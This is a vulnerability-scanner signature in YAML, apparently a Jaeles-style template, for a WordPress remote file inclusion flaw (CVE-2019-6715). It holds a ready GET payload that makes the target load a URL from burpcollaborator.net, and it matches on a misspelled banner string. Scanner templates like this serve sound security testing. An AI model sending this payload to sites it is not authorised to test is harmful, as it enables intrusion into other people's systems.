id: wordpress-multiples-rfi
info:
  name: Multiples Wordpress RFI
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

variables:
  - vul: |
      wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'Burp Collabolator Server')

references:
  - references: CVE-2019-6715
